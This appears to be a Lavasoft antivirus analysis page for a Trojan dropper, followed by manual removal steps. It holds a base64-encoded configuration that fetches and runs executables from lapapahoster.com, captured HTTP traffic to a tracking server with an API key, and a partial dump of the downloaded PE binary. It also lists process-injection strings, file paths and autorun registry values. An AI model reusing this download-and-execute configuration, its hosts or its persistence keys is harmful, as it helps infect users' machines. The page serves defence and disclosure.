DQoNCjxjb25kaXRpb25zPg0KDQo8bW9kIHR5cGU9ImNoZWNrIiBuYW1lPSJFcmE1TGUiIH
ZhbHVlPSJ1MTcwNzAxIiBtYXRjaD0iZmFsc2UiLz4NCg0KPC9jb25kaXRpb25zPg0KPC90
YXNrPjx0YXNrPg0KDQo8cGVyZm9ybT4NCg0KPGRvd25sb2FkIG5hbWU9Ikxpa2UiIHZhbH
VlPSJodHRwOi8vbGFwYXBhaG9zdGVyLmNvbS9nZXQvNC91cGRhdGVyLmV4ZSIgdmVyc2lv
bj0iIiAgc29mdHdhcmU9IiIgbmV0PSJ5ZXMiIC8 DQo8cHJvY2VzcyB0eXBlPSJzdGFydC
IgbmFtZT0iTGlrZSIgdmFsdWU9IndhaXQiIHBhcmFtcz0id2UiLz4NCjxtb2QgdHlwZT0i
YWRkIiBuYW1lPSJ1cFRvRGF0ZSIgdmFsdWU9IlNTYWFhMTcwNzAxIi8 DQoNCjwvcGVyZm
9ybT4NCg0KPGNvbmRpdGlvbnM DQoNCjxtb2QgdHlwZT0iY2hlY2siIG5hbWU9InVw
<<< skipped >>>


POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




api_key=fa02609b-2368-11e6-922f-0cc47a47968c

HTTP/1.1 200 OK


Date: Sat, 01 Jul 2017 10:27:39 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=i0fqu3ni9fas4rf4svpbp2mo70; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}....


POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok HTTP/1.1


Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue


HTTP/1.1 100 Continue
....




api_key=fa02609b-2368-11e6-922f-0cc47a47968c

HTTP/1.1 200 OK


Date: Sat, 01 Jul 2017 10:27:39 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=4jkbd69eeilchgv5ph8rmakpn5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}..



GET /safe_download/582369/AdsShow.exe HTTP/1.1
Host: lapapahoster.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 10:27:38 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
2200..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
..=.VY.........."...0..............4... ...@....@.. ..................
..................@..................................3..O....@........
...............`.......2..............................................
. ............... ..H............text...4.... ...................... .
.`.rsrc........@......................@..@.reloc.......`....... ......
........@..B.................4......H........!...............1........
.......................................0..k.........,f.. ..... ....1..
....X.. ....2.~....r...p.o....%(....r]..pra..po....rc..p(....o....rc..
p(....o....o....*..(....*..0..2.......s.......(....rg..p( ....-...."..
.C ....(.... .&..*...................0..[........,."...E.. P.....rw..p
..,. `......o!...Z("......r...p(#...&r...p($...& `.......o!...Z("...*.
~....-.r...p.....(%...o&...s'........~....*.~....*.......*.~....*..((.
..*Vs....()...t.........*.BSJB............v2.0.50727......l.......#~..
....\...#Strings....\.......#US.........#GUID...........#Blob.........
..WU.........3........'...................)...........................
........................{.................d.......=...^.=...?.=.....=.
....=.....=.....=.........7.......=.........#.....\.I.................
....O.....E.....v...........o.....Y.......................@...........
r.....g.....7.=.........1.V.........`...........................J.w.I.
..........w.I...........w.I...........s.I...........s.u.........J.
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

iexplore.exe_2172:

.text
`.data
.rsrc
@.reloc
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
KEYW
KEYWh
KEYWD
.ENNNG.
a.ry.v
l.igM4
?1%SGf
xh.JW^
.97777"7" " " !
3.... )) 
8888888888888
8888888888
.lPV)
úW1
.ApX/
H.ZAf
ð[U
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
Y.hilkRROMLK=C,
..(((($$
3...((((%
3....(.''$
3.2...((((%
33.2....(,'
55323222...
(%&'00443445?
00.,,,4(
000.,,9(
0020..9(
003200;(
(#'( (''''!'!
Microsoft.InternetExplorer.Default
-user32.dll
Kernel32.DLL
-xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}
"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}
\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421

iexplore.exe_1256:

.text
`.data
.rsrc
@.reloc
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
KEYW
KEYWh
KEYWD
.ENNNG.
a.ry.v
l.igM4
?1%SGf
xh.JW^
.97777"7" " " !
3.... )) 
8888888888888
8888888888
.lPV)
úW1
.ApX/
H.ZAf
ð[U
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
Y.hilkRROMLK=C,
..(((($$
3...((((%
3....(.''$
3.2...((((%
33.2....(,'
55323222...
(%&'00443445?
00.,,,4(
000.,,9(
0020..9(
003200;(
(#'( (''''!'!
Microsoft.InternetExplorer.Default
-user32.dll
Kernel32.DLL
-xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}
"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}
\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421

L37EQRQBZ.exe_3840_rwx_00302000_00009000:

.JhppJh

L37EQRQBZ.exe_3840_rwx_005B0000_0000F000:

o.jY[^_]


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    AfficheOne.exe:1472
    Era5Le.exe:720
    Like.exe:2336
    %original file name%.exe:3380

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Roaming\0mpz3dha0z2\b5c1hnwf0gs.exe (208 bytes)
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (868 bytes)
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (868 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\0mpz3dha0z2\b5c1hnwf0gs.exe.config (1 bytes)
    %Program Files%\8E1ZIRJA0X\cast.config (36 bytes)
    %Program Files%\8E1ZIRJA0X\uninstaller.exe (25488 bytes)
    %Program Files%\8E1ZIRJA0X\L37EQRQBZ.exe.config (1 bytes)
    %Program Files%\8E1ZIRJA0X\uninstaller.exe.config (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (852 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\BFX6SAZTX6\AfficheOne.exe (400 bytes)
    C:\config.conf (62 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\BFX6SAZTX6\Like.exe (232527 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\BFX6SAZTX6\Era5Le.exe (17276 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\BFX6SAZTX6\AfficheOne.exe.config (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\BFX6SAZTX6\Like.exe.config (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\BFX6SAZTX6\Era5Le.exe.config (1 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "2niiqjaqkuj" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\0mpz3dha0z2\b5c1hnwf0gs.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "5K2HTR1KQOQBJKK" = "%Program Files%\8E1ZIRJA0X\L37EQRQBZ.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "OMEWPRODUCT_8TSGI" = "C:\%original file name%.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now